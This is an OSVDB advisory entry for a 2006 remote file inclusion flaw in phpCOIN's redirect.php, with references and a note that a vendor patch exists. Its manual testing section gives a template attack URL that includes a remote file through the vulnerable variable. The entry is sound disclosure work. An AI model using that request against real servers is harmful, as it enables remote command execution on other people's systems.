phpCOIN redirect.php _CCFG[_PKG_PATH_INCL] Variable Remote File Inclusion

2006-08-24T04:34:21
ID OSVDB:28224
Type osvdb
Reporter Timq(timq@hackernetwork.com)
Modified 2006-08-24T04:34:21

Description

Vulnerability Description

phpCOIN contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to redirect.php not properly sanitizing user input supplied to the '_CCFG[_PKG_PATH_INCL]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has released a patch to address this vulnerability.

Short Description

phpCOIN contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to redirect.php not properly sanitizing user input supplied to the '_CCFG[_PKG_PATH_INCL]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/coin_includes/redirect.php?_CCFG[_PKG_PATH_INCL]=[file]

References:

Vendor URL: http://www.phpcoin.com/ Vendor Specific Solution URL: http://forums.phpcoin.com//index.php?showtopic=3&st=0&#entry3 Secunia Advisory ID:21624 Related OSVDB ID: 28218 Related OSVDB ID: 28221 Related OSVDB ID: 28222 Related OSVDB ID: 28219 Related OSVDB ID: 28223 Related OSVDB ID: 28220 Related OSVDB ID: 28225 Nessus Plugin ID:22267 ISS X-Force ID: 28572 Generic Exploit URL: http://milw0rm.com/exploits/2254 FrSIRT Advisory: ADV-2006-3385 CVE-2006-4425 Bugtraq ID: 19706